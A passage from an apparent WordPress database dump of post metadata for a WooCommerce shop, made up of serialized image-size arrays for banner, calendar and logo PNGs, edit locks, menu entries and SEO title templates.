:{s:4:\"file\";s:32:\"banner-Recovered-03-2048x957.png\";s:5:\"width\";i:2048;s:6:\"height\";i:957;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:46:\"banner-Recovered-03-e1643805423490-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:46:\"banner-Recovered-03-e1643805423490-600x280.png\";s:5:\"width\";i:600;s:6:\"height\";i:280;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:46:\"banner-Recovered-03-e1643805423490-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:44:\"banner-Recovered-03-e1643805423490-48x22.png\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:44:\"banner-Recovered-03-e1643805423490-48x22.png\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2523,703,'_wp_attachment_backup_sizes','a:16:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:3834;s:6:\"height\";i:1792;s:4:\"file\";s:23:\"banner-Recovered-03.png\";}s:18:\"full-1643805423490\";a:3:{s:5:\"width\";i:920;s:6:\"height\";i:430;s:4:\"file\";s:38:\"banner-Recovered-03-e1643805411102.png\";}s:14:\"thumbnail-orig\";a:4:{s:4:\"file\";s:31:\"banner-Recovered-03-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"medium-orig\";a:4:{s:4:\"file\";s:31:\"banner-Recovered-03-300x140.png\";s:5:\"width\";i:300;s:6:\"height\";i:140;s:9:\"mime-type\";s:9:\"image/png\";}s:17:\"medium_large-orig\";a:4:{s:4:\"file\";s:31:\"banner-Recovered-03-768x359.png\";s:5:\"width\";i:768;s:6:\"height\";i:359;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"large-orig\";a:4:{s:4:\"file\";s:32:\"banner-Recovered-03-1024x479.png\";s:5:\"width\";i:1024;s:6:\"height\";i:479;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"1536x1536-orig\";a:4:{s:4:\"file\";s:32:\"banner-Recovered-03-1536x718.png\";s:5:\"width\";i:1536;s:6:\"height\";i:718;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"2048x2048-orig\";a:4:{s:4:\"file\";s:32:\"banner-Recovered-03-2048x957.png\";s:5:\"width\";i:2048;s:6:\"height\";i:957;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"woocommerce_thumbnail-orig\";a:5:{s:4:\"file\";s:31:\"banner-Recovered-03-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:23:\"woocommerce_single-orig\";a:4:{s:4:\"file\";s:31:\"banner-Recovered-03-600x280.png\";s:5:\"width\";i:600;s:6:\"height\";i:280;s:9:\"mime-type\";s:9:\"image/png\";}s:34:\"woocommerce_gallery_thumbnail-orig\";a:4:{s:4:\"file\";s:31:\"banner-Recovered-03-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:17:\"shop_catalog-orig\";a:4:{s:4:\"file\";s:31:\"banner-Recovered-03-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"shop_single-orig\";a:4:{s:4:\"file\";s:31:\"banner-Recovered-03-600x280.png\";s:5:\"width\";i:600;s:6:\"height\";i:280;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"shop_thumbnail-orig\";a:4:{s:4:\"file\";s:31:\"banner-Recovered-03-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"thaps-thumb-img-orig\";a:4:{s:4:\"file\";s:29:\"banner-Recovered-03-48x22.png\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"taiowc-thumb-img-orig\";a:4:{s:4:\"file\";s:29:\"banner-Recovered-03-48x22.png\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}}'),(2537,636,'_edit_lock','1666941790:1'),(2606,710,'_wp_attached_file','2022/02/calender-03-e1643956916518.png'),(2607,710,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:920;s:6:\"height\";i:430;s:4:\"file\";s:38:\"2022/02/calender-03-e1643956916518.png\";s:8:\"filesize\";i:52376;s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:38:\"calender-03-e1643956916518-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:14835;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:38:\"calender-03-e1643956916518-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:5812;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:36:\"calender-03-e1643956916518-50x23.png\";s:5:\"width\";i:50;s:6:\"height\";i:23;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2741;}s:6:\"medium\";a:4:{s:4:\"file\";s:38:\"calender-03-e1643956916518-300x140.png\";s:5:\"width\";i:300;s:6:\"height\";i:140;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:24:\"calender-03-1024x479.png\";s:5:\"width\";i:1024;s:6:\"height\";i:479;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"calender-03-e1643956916518-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:38:\"calender-03-e1643956916518-768x359.png\";s:5:\"width\";i:768;s:6:\"height\";i:359;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:24:\"calender-03-1536x718.png\";s:5:\"width\";i:1536;s:6:\"height\";i:718;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:24:\"calender-03-2048x958.png\";s:5:\"width\";i:2048;s:6:\"height\";i:958;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:38:\"calender-03-e1643956916518-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:38:\"calender-03-e1643956916518-600x280.png\";s:5:\"width\";i:600;s:6:\"height\";i:280;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:38:\"calender-03-e1643956916518-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:36:\"calender-03-e1643956916518-48x22.png\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:36:\"calender-03-e1643956916518-48x22.png\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2608,710,'_wp_attachment_backup_sizes','a:16:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:3834;s:6:\"height\";i:1793;s:4:\"file\";s:15:\"calender-03.png\";}s:18:\"full-1643956916518\";a:3:{s:5:\"width\";i:920;s:6:\"height\";i:430;s:4:\"file\";s:30:\"calender-03-e1643956906939.png\";}s:14:\"thumbnail-orig\";a:4:{s:4:\"file\";s:23:\"calender-03-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"medium-orig\";a:4:{s:4:\"file\";s:23:\"calender-03-300x140.png\";s:5:\"width\";i:300;s:6:\"height\";i:140;s:9:\"mime-type\";s:9:\"image/png\";}s:17:\"medium_large-orig\";a:4:{s:4:\"file\";s:23:\"calender-03-768x359.png\";s:5:\"width\";i:768;s:6:\"height\";i:359;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"large-orig\";a:4:{s:4:\"file\";s:24:\"calender-03-1024x479.png\";s:5:\"width\";i:1024;s:6:\"height\";i:479;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"1536x1536-orig\";a:4:{s:4:\"file\";s:24:\"calender-03-1536x718.png\";s:5:\"width\";i:1536;s:6:\"height\";i:718;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"2048x2048-orig\";a:4:{s:4:\"file\";s:24:\"calender-03-2048x958.png\";s:5:\"width\";i:2048;s:6:\"height\";i:958;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"woocommerce_thumbnail-orig\";a:5:{s:4:\"file\";s:23:\"calender-03-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:23:\"woocommerce_single-orig\";a:4:{s:4:\"file\";s:23:\"calender-03-600x281.png\";s:5:\"width\";i:600;s:6:\"height\";i:281;s:9:\"mime-type\";s:9:\"image/png\";}s:34:\"woocommerce_gallery_thumbnail-orig\";a:4:{s:4:\"file\";s:23:\"calender-03-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:17:\"shop_catalog-orig\";a:4:{s:4:\"file\";s:23:\"calender-03-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"shop_single-orig\";a:4:{s:4:\"file\";s:23:\"calender-03-600x281.png\";s:5:\"width\";i:600;s:6:\"height\";i:281;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"shop_thumbnail-orig\";a:4:{s:4:\"file\";s:23:\"calender-03-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"thaps-thumb-img-orig\";a:4:{s:4:\"file\";s:21:\"calender-03-48x22.png\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"taiowc-thumb-img-orig\";a:4:{s:4:\"file\";s:21:\"calender-03-48x22.png\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}}'),(2610,712,'_wp_attached_file','2022/02/banner-3-01-e1643957021628.png'),(2611,712,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:915;s:6:\"height\";i:150;s:4:\"file\";s:38:\"2022/02/banner-3-01-e1643957021628.png\";s:8:\"filesize\";i:60762;s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:38:\"banner-3-01-e1643957021628-320x150.png\";s:5:\"width\";i:320;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:24657;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:38:\"banner-3-01-e1643957021628-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:8878;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:35:\"banner-3-01-e1643957021628-50x8.png\";s:5:\"width\";i:50;s:6:\"height\";i:8;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:787;}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"banner-3-01-300x49.png\";s:5:\"width\";i:300;s:6:\"height\";i:49;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:24:\"banner-3-01-1024x168.png\";s:5:\"width\";i:1024;s:6:\"height\";i:168;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"banner-3-01-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"banner-3-01-768x126.png\";s:5:\"width\";i:768;s:6:\"height\";i:126;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:24:\"banner-3-01-1536x252.png\";s:5:\"width\";i:1536;s:6:\"height\";i:252;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:24:\"banner-3-01-2048x336.png\";s:5:\"width\";i:2048;s:6:\"height\";i:336;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:23:\"banner-3-01-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:22:\"banner-3-01-600x98.png\";s:5:\"width\";i:600;s:6:\"height\";i:98;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:23:\"banner-3-01-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:20:\"banner-3-01-48x8.png\";s:5:\"width\";i:48;s:6:\"height\";i:8;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:20:\"banner-3-01-48x8.png\";s:5:\"width\";i:48;s:6:\"height\";i:8;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2612,712,'_edit_lock','1643956931:1'),(2613,712,'_wp_attachment_backup_sizes','a:1:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:3813;s:6:\"height\";i:625;s:4:\"file\";s:15:\"banner-3-01.png\";}}'),(2614,712,'_edit_last','1'),(2615,712,'_aioseo_title','#post_title #separator_sa #site_title'),(2616,712,'_aioseo_description','#attachment_caption'),(2617,712,'_aioseo_keywords',''),(2618,712,'_aioseo_og_title',NULL),(2619,712,'_aioseo_og_description',NULL),(2620,712,'_aioseo_og_article_section',''),(2621,712,'_aioseo_og_article_tags',''),(2622,712,'_aioseo_twitter_title',NULL),(2623,712,'_aioseo_twitter_description',NULL),(2626,713,'_wp_attached_file','2022/02/calender-03-1.png'),(2627,713,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:3834;s:6:\"height\";i:1793;s:4:\"file\";s:25:\"2022/02/calender-03-1.png\";s:8:\"filesize\";i:77282;s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:25:\"calender-03-1-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:9522;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:25:\"calender-03-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:3808;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:23:\"calender-03-1-50x23.png\";s:5:\"width\";i:50;s:6:\"height\";i:23;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2752;}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"calender-03-1-300x140.png\";s:5:\"width\";i:300;s:6:\"height\";i:140;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:26:\"calender-03-1-1024x479.png\";s:5:\"width\";i:1024;s:6:\"height\";i:479;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"calender-03-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"calender-03-1-768x359.png\";s:5:\"width\";i:768;s:6:\"height\";i:359;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:26:\"calender-03-1-1536x718.png\";s:5:\"width\";i:1536;s:6:\"height\";i:718;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:26:\"calender-03-1-2048x958.png\";s:5:\"width\";i:2048;s:6:\"height\";i:958;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:25:\"calender-03-1-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:25:\"calender-03-1-600x281.png\";s:5:\"width\";i:600;s:6:\"height\";i:281;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:25:\"calender-03-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:23:\"calender-03-1-48x22.png\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:23:\"calender-03-1-48x22.png\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2631,716,'_edit_lock','1643959270:1'),(2632,716,'_edit_last','1'),(2633,716,'_aioseo_title','#post_title #separator_sa #site_title'),(2634,716,'_aioseo_description','#post_content'),(2635,716,'_aioseo_keywords',''),(2636,716,'_aioseo_og_title',NULL),(2637,716,'_aioseo_og_description',NULL),(2638,716,'_aioseo_og_article_section',''),(2639,716,'_aioseo_og_article_tags',''),(2640,716,'_aioseo_twitter_title',NULL),(2641,716,'_aioseo_twitter_description',NULL),(2642,718,'_edit_lock','1643959325:1'),(2645,718,'_edit_last','1'),(2646,718,'_aioseo_title','#post_title #separator_sa #site_title'),(2647,718,'_aioseo_description','#post_excerpt'),(2648,718,'_aioseo_keywords',''),(2649,718,'_aioseo_og_title',NULL),(2650,718,'_aioseo_og_description',NULL),(2651,718,'_aioseo_og_article_section',''),(2652,718,'_aioseo_og_article_tags',''),(2653,718,'_aioseo_twitter_title',NULL),(2654,718,'_aioseo_twitter_description',NULL),(2655,718,'_wcfm_article_views','51'),(2656,720,'_edit_lock','1643959500:1'),(2657,720,'_edit_last','1'),(2658,720,'_aioseo_title','#post_title #separator_sa #site_title'),(2659,720,'_aioseo_description','#post_content'),(2660,720,'_aioseo_keywords',''),(2661,720,'_aioseo_og_title',NULL),(2662,720,'_aioseo_og_description',NULL),(2663,720,'_aioseo_og_article_section',''),(2664,720,'_aioseo_og_article_tags',''),(2665,720,'_aioseo_twitter_title',NULL),(2666,720,'_aioseo_twitter_description',NULL),(2722,732,'_edit_lock','1643970738:1'),(2725,732,'_edit_last','1'),(2726,732,'_aioseo_title','#post_title #separator_sa #site_title'),(2727,732,'_aioseo_description','#post_excerpt'),(2728,732,'_aioseo_keywords',''),(2729,732,'_aioseo_og_title',NULL),(2730,732,'_aioseo_og_description',NULL),(2731,732,'_aioseo_og_article_section',''),(2732,732,'_aioseo_og_article_tags',''),(2733,732,'_aioseo_twitter_title',NULL),(2734,732,'_aioseo_twitter_description',NULL),(2735,732,'_wcfm_article_views','51'),(2771,742,'_wp_attached_file','2022/02/calender-03-2.png'),(2772,742,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:3834;s:6:\"height\";i:1793;s:4:\"file\";s:25:\"2022/02/calender-03-2.png\";s:8:\"filesize\";i:77282;s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:25:\"calender-03-2-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:9522;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:25:\"calender-03-2-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:3808;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:23:\"calender-03-2-50x23.png\";s:5:\"width\";i:50;s:6:\"height\";i:23;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2752;}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"calender-03-2-300x140.png\";s:5:\"width\";i:300;s:6:\"height\";i:140;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:26:\"calender-03-2-1024x479.png\";s:5:\"width\";i:1024;s:6:\"height\";i:479;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"calender-03-2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"calender-03-2-768x359.png\";s:5:\"width\";i:768;s:6:\"height\";i:359;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:26:\"calender-03-2-1536x718.png\";s:5:\"width\";i:1536;s:6:\"height\";i:718;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:26:\"calender-03-2-2048x958.png\";s:5:\"width\";i:2048;s:6:\"height\";i:958;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:25:\"calender-03-2-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:25:\"calender-03-2-600x281.png\";s:5:\"width\";i:600;s:6:\"height\";i:281;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:25:\"calender-03-2-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:23:\"calender-03-2-48x22.png\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:23:\"calender-03-2-48x22.png\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2776,745,'_customize_changeset_uuid','e8b93bba-ff4c-4abf-aba0-7a664bc0b160'),(2777,748,'_menu_item_type','post_type'),(2778,748,'_menu_item_menu_item_parent','0'),(2779,748,'_menu_item_object_id','745'),(2780,748,'_menu_item_object','page'),(2781,748,'_menu_item_target',''),(2782,748,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(2783,748,'_menu_item_xfn',''),(2784,748,'_menu_item_url',''),(2806,751,'_wp_attached_file','2022/02/logo-2-03.png'),(2807,751,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2084;s:6:\"height\";i:1042;s:4:\"file\";s:21:\"2022/02/logo-2-03.png\";s:8:\"filesize\";i:22205;s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:21:\"logo-2-03-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:11190;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:21:\"logo-2-03-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2735;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:19:\"logo-2-03-50x25.png\";s:5:\"width\";i:50;s:6:\"height\";i:25;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:768;}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"logo-2-03-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"logo-2-03-1024x512.png\";s:5:\"width\";i:1024;s:6:\"height\";i:512;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"logo-2-03-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"logo-2-03-768x384.png\";s:5:\"width\";i:768;s:6:\"height\";i:384;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:22:\"logo-2-03-1536x768.png\";s:5:\"width\";i:1536;s:6:\"height\";i:768;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:23:\"logo-2-03-2048x1024.png\";s:5:\"width\";i:2048;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:21:\"logo-2-03-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:21:\"logo-2-03-600x300.png\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"logo-2-03-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:19:\"logo-2-03-48x24.png\";s:5:\"width\";i:48;s:6:\"height\";i:24;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:19:\"logo-2-03-48x24.png\";s:5:\"width\";i:48;s:6:\"height\";i:24;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0